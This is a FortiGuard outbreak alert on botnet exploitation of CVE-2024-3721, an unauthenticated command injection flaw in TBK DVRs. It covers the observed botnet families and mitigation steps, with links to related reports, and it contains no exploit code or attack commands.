TBK DVRs Botnet Attack

Widespread Exploitation Attempts Targeting IoT Device

https://www.fortiguard.com/encyclopedia/ips/55717

CVEs: CVE-2024-3721

Threat Actors are actively exploiting CVE-2024-3721, a command injection vulnerability in TBK DVR devices (Digital Video Recorders). This flaw allows unauthenticated remote code execution (RCE) via crafted HTTP requests to the endpoint. The compromised devices are conscripted into a botnet capable of conducting DDoS attacks.

FortiGuard Labs has detected a significant increase in malicious network activity exploiting CVE-2024-3721, a critical unauthenticated command injection vulnerability affecting TBK DVR devices. FortiGuard’s global network of intrusion prevention system (IPS) sensors recorded over 60,000 detection events, indicating widespread and coordinated exploitation attempts. Our telemetry data reveals that multiple botnet operators are actively leveraging this vulnerability to expand their infrastructure. Notably, we have observed payloads and behaviors associated with Condi, Fodcha, Mirai, and Unstable botnet families- each known for targeting IoT devices to perform large-scale distributed denial-of-service (DDoS) attacks and establish persistent remote access. FortiGuard Labs continues to monitor this threat and will provide further intelligence as it becomes available. FortiGuard has previously released an Outbreak Alert for a different TBK vulnerability (CVE-2018-9995) exploited to spread Remote Access Trojan called HiatusRAT.

Currently, we are unaware of any vendor supplied patch or updates available for this issue. Immediate patching is recommended once available. Alternatively, we recommend isolating or replacing the TBK DVRs and Monitor for unusual traffic patterns or binary drops from DVRs. Organizations with internet-facing DVR systems are strongly urged to take immediate mitigation steps, including: -Blocking known indicators of compromise (IoCs) linked to these botnets. -Applying firmware patches or security updates from the vendor, if and when available. -Restricting remote access to DVR interfaces and placing them behind firewalls or VPNs.

June 10, 2025: FortiGuard released a Threat Signal Report
https://www.fortiguard.com/threat-signal-report/6127/tbk-dvrs-botnet-attack
June 06, 2025: Analysis of the latest Mirai wave exploiting TBK DVR devices by Securelist
https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/

PROTECT

Countermeasures across the security fabric for protecting assets, data and network from cybersecurity events:

DETECT

Find and correlate important information to identify an outbreak, the following updates are available to raise alert and generate reports:

RESPOND

Develop containment techniques to mitigate impacts of security events:

RECOVER

Improve security posture and processes by implementing security awareness and training, in preparation for (and recovery from) security incidents:

IDENTIFY

Identify processes and assets that need protection:

Additional Resources

FortiGuard Threat Signal

https://www.fortiguard.com/threat-signal-report/6127/tbk-dvrs-botnet-attack

Securelist Blog

https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/

Learn more about FortiGuard Outbreak Alerts